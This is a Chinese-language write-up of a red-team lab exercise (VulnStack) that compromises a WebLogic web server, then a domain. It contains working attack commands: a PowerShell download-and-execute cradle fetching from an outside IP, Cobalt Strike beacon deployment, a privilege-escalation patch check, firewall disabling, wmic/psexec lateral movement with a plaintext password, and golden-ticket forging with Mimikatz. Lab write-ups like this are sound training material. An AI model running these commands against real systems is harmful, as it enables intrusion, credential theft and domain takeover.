红日安全内网渗透笔记

靶场下载地址：漏洞详情

环境配置参考：【红日安全-VulnStack】ATT&CK实战系列——红队实战(二) - yokan - 博客园

此实战仅有3台机器 DMZ区的WEB机 、核心区的AD机、办公区的PC

第一步：信息收集（模拟黑盒测试）

已知WEB机的IP地址，用syn包进行扫描。

nmap -sS -v 192.168.111.80

获得开放端口

WEB服务器：
Nmap scan report for 192.168.111.80
PORT      STATE SERVICE
80/tcp    open  http       
135/tcp   open  msrpc
139/tcp   open  netbios-ssn    Samba服务  存在爆破/未授权访问/远程命令执行漏洞
445/tcp   open  microsoft-ds   smb服务  ms17-010/端口溢出漏洞
1433/tcp  open  ms-sql-s  存在mssql服务  存在爆破/注入/SA弱口令
3389/tcp  open  ms-wbt-server  存在远程桌面
7001/tcp  open  afs3-callback    weblogic漏洞
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
MAC Address: 00:0C:29:68:D3:5F (VMware)

 whatWEB扫描

whatweb http://192.168.111.80:7001

得到信息:

http://192.168.111.80:7001 [404 Not Found]
 Country[RESERVED][ZZ], IP[192.168.111.80],
 Java[2.1][Servlet/2.5],
 Title[Error 404--Not Found], 
X-Powered-By[Servlet/2.5 JSP/2.1]

观察知道这是一个java开发的WEB，那就扫扫看有没有java类的漏洞 

工具地址：GitHub - rabbitmask/WeblogicScan: Weblogic一键漏洞检测工具，V1.5，更新时间：20200730

利用到WeblogicScan来扫描 

python3 WeblogicScan.py -u 192.168.111.80 -p 7001

得到漏洞信息：

 [192.168.111.80:7001] Weblogic Version Is 10.3.6.0
[+] [192.168.111.80:7001] Weblogic console address is exposed! The path is: http://192.168.111.80:7001/console/login/LoginForm.jsp
[+] [192.168.111.80:7001] Weblogic UDDI module is exposed! The path is: http://192.168.111.80:7001/uddiexplorer/
[-] [192.168.111.80:7001] weblogic not detected CVE-2016-0638
[-] [192.168.111.80:7001] weblogic not detected CVE-2016-3510
[-] [192.168.111.80:7001] weblogic not detected CVE-2017-10271
[-] [192.168.111.80:7001] weblogic not detected CVE-2017-3248
[-] [192.168.111.80:7001] weblogic not detected CVE-2017-3506
[-] [192.168.111.80:7001] weblogic not detected CVE-2018-2628
[-] [192.168.111.80:7001] weblogic not detected CVE-2018-2893
[-] [192.168.111.80:7001] weblogic not detected CVE-2018-2894
[+] [192.168.111.80:7001] weblogic has a JAVA deserialization vulnerability:CVE-2019-2725
[+] [192.168.111.80:7001] weblogic has a JAVA deserialization vulnerability:CVE-2019-2729
[-] [192.168.111.80:7001] weblogic not detected CVE-2019-2890

发现两个java序列化漏洞

扫描WEB目录：

dirb http://192.168.111.80:7001

获得信息

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Apr 10 02:14:41 2022
URL_BASE: http://192.168.111.80:7001/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------


        
---- Scanning URL: http://192.168.111.80:7001/ ----
+ http://192.168.111.80:7001/console (CODE:200|SIZE:416)                             
==> DIRECTORY: http://192.168.111.80:7001/uddi/        
DIRECTORY: http://192.168.111.80:7001/uddiexplorer/                               
                                                                                     
---- Entering directory: http://192.168.111.80:7001/uddi/ ----
==> DIRECTORY: http://192.168.111.80:7001/uddi/images/                               
                                                                                     
---- Entering directory: http://192.168.111.80:7001/uddi/images/ ----
                                                                                     
-----------------
END_TIME: Sun Apr 10 02:15:21 2022
DOWNLOADED: 13836 - FOUND: 1

都去访问一下就知道，uddi目录是没有权限进入的，但是uddiexplorer可以进入，这里将成为我们大马的安家之地。

第二步  漏洞利用:

使用java 反序列化终极测试工具测试漏洞

Java反序列化终极检测工具_Jboss & Weblogic & Websphere.zip - 开发实例、源码下载 - 好例子网

执行命令权限administrator，webshell上传一个jsp大马，利用文件管理寻找前面分析的uddiexplorer这个目录。

上传shell

 上传的冰蝎我没成功，无法连接，但是我上传其他的大马。

 github有很多，搜索关键词shell就可以找到！

可能是版本问题，java，或者命令行转义问题等。。。

powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring('http://172.16.250.3:8022/a') 

这条命令的CS利用，我并没有成功。但是我发现file upload是可以用的，于是我决定用beacon.exe来获取shell，上线CS

第三步  上线CS：

CS制作小马

 

 获得一个beacon.exe

 利用浏览器的大马上传这个beancon.exe 到 windows/temp/

 然后进入cmd执行里执行这句话：

 

 .... 发现CS就上线了

提权：

利用漏洞提权：

jsp大马中
----------------
先输入这条代码：

systeminfo>C:\Windows\Temp\a.txt&(for %i in (
KB3124280 KB3143141 KB3134228 KB3079904 KB3077657 KB3124280 KB3045171 KB2829361 KB3000061 KB3000061 KB2850851 KB2707511 KB970483 KB2124261 KB2271195 KB2503665 KB3031432) do @type C:\Windows\Temp\a.txt|@find /I "%i"|| @echo %i Not Installed!)&del /f /q /a C:\Windows\Temp\a.txt

 

下面是漏洞对照表:

----------------------------------------
CVE-2017-0213 　[Windows COM Elevation of Privilege Vulnerability]　　(windows 10/8.1/7/2016/2010/2008)
MS17-010 　[KB4013389]　　[Windows Kernel Mode Drivers]　　(windows 7/2008/2003/XP)
MS16-135 　[KB3199135]　　[Windows Kernel Mode Drivers]　　(2016)
MS16-098 　[KB3178466]　　[Kernel Driver]　　(Win 8.1)
MS16-075 　[KB3164038]　　[Hot Potato]　　(2003/2008/7/8/2012)
MS16-032 　[KB3143141]　　[Secondary Logon Handle]　　(2008/7/8/10/2012)
MS16-016 　[KB3136041]　　[WebDAV]　　(2008/Vista/7)
MS15-097 　[KB3089656]　　[remote code execution]　　(win8.1/2012)
MS15-076 　[KB3067505]　　[RPC]　　(2003/2008/7/8/2012)
MS15-077 　[KB3077657]　　[ATM]　　(XP/Vista/Win7/Win8/2000/2003/2008/2012)
MS15-061 　[KB3057839]　　[Kernel Driver]　　(2003/2008/7/8/2012)
MS15-051 　[KB3057191]　　[Windows Kernel Mode Drivers]　　(2003/2008/7/8/2012)
MS15-010 　[KB3036220]　　[Kernel Driver]　　(2003/2008/7/8)
MS15-015 　[KB3031432]　　[Kernel Driver]　　(Win7/8/8.1/2012/RT/2012 R2/2008 R2)
MS15-001 　[KB3023266]　　[Kernel Driver]　　(2008/2012/7/8)
MS14-070 　[KB2989935]　　[Kernel Driver]　　(2003)
MS14-068 　[KB3011780]　　[Domain Privilege Escalation]　　(2003/2008/2012/7/8)
MS14-058 　[KB3000061]　　[Win32k.sys]　　(2003/2008/2012/7/8)
MS14-040 　[KB2975684]　　[AFD Driver]　　(2003/2008/2012/7/8)
MS14-002 　[KB2914368]　　[NDProxy]　　(2003/XP)
MS13-053 　[KB2850851]　　[win32k.sys]　　(XP/Vista/2003/2008/win 7)
MS13-046 　[KB2840221]　　[dxgkrnl.sys]　　(Vista/2003/2008/2012/7)
MS13-005 　[KB2778930]　　[Kernel Mode Driver]　　(2003/2008/2012/win7/8)
MS12-042 　[KB2972621]　　[Service Bus]　　(2008/2012/win7)
MS12-020 　[KB2671387]　　[RDP]　　(2003/2008/7/XP)
MS11-080 　[KB2592799]　　[AFD.sys]　　(2003/XP)
MS11-062 　[KB2566454]　　[NDISTAPI]　　(2003/XP)
MS11-046 　[KB2503665]　　[AFD.sys]　　(2003/2008/7/XP)
MS11-011 　[KB2393802]　　[kernel Driver]　　(2003/2008/7/XP/Vista)
MS10-092 　[KB2305420]　　[Task Scheduler]　　(2008/7)
MS10-065 　[KB2267960]　　[FastCGI]　　(IIS 5.1, 6.0, 7.0, and 7.5)
MS10-059 　[KB982799]　　 [ACL-Churraskito]　　(2008/7/Vista)
MS10-048 　[KB2160329]　　[win32k.sys]　　(XP SP2 & SP3/2003 SP2/Vista SP1 & SP2/2008 Gold & SP2 & R2/Win7)
MS10-015 　[KB977165]　　 [KiTrap0D]　　(2003/2008/7/XP)
MS09-050 　[KB975517]　　 [Remote Code Execution]　　(2008/Vista)
MS09-020 　[KB970483]　　 [IIS 6.0]　　(IIS 5.1 and 6.0)
MS09-012 　[KB959454]　　 [Chimichurri]　　(Vista/win7/2008/Vista)
MS08-068 　[KB957097]　　 [Remote Code Execution]　　(2000/XP)
MS08-067 　[KB958644]　　 [Remote Code Execution]　　(Windows 2000/XP/Server 2003/Vista/Server 2008)
MS08-025 　[KB941693]　　 [Win32.sys]　　(XP/2003/2008/Vista)
MS06-040 　[KB921883]　　 [Remote Code Execution]　　(2003/xp/2000)
MS05-039 　[KB899588]　　 [PnP Service]　　(Win 9X/ME/NT/2000/XP/2003)
MS03-026 　[KB823980]　　 [Buffer Overrun In RPC Interface]　　(/NT/2000/XP/2003)

随便找个漏洞的exp来提权，我这里就跳过上传步骤了，直接到CS上线

Win64.exe是exp

CS下执行找个：

shell C:\Windows\Temp\Win64.exe "C:\Windows\Temp\beacon5.exe"

执行后CS上线

 域信息收集

ipconfig /all
查看域名 net config workstation
关闭防火墙  netsh advfirewall set allprofiles state off
查看有几个域  net view /domain
查看域内主机   nei view
查询域内用户   net user /domain #该命令在本环境中需要在system权限下执行
查看域管理员   net group "domain admins" /domain  
查看域控    net group "domain controllers" /domain

Portscan

 

 然后在tagert里面psexec上线DC的CS

 

接下来，讲讲如何利用CS做socks4a 来获取AD机器Cs上线

 

 

 

 

 

 

一样的，上传这个beacon.exe  到AD机上，WEB机上用IPC来vmic命令远程执行

命令如下

 shell wmic /node:10.10.10.10 /user:administrator /password:1qaz@WSX process call create "C:\Windows\Temp\payload.exe"

user可以改成de1ay，改谁就获得谁CS上线的权限

4.2黄金票据利用

黄金票据是伪造票据授予票据（TGT），也被称为认证票据。TGT仅用于向域控制器上的密钥分配中心（KDC）证明用户已被其他域控制器认证。

黄金票据的条件要求：

1.域名称

2.域的SID值

3.域的KRBTGT账户NTLM密码哈希

4.伪造用户名

cs的DUmp hashs  和 Run Mimikatz 获得KRBTGT的hash值和域的SID

 

Golden Ticket 就是黄金票据。

制作完成后，在tagert上线时候

即使AD机改了管理员密码，你依然可以利用这个票据来获得管理员权限上线AD机

参考：

【红日安全-VulnStack】ATT&CK实战系列——红队实战(二) - yokan - 博客园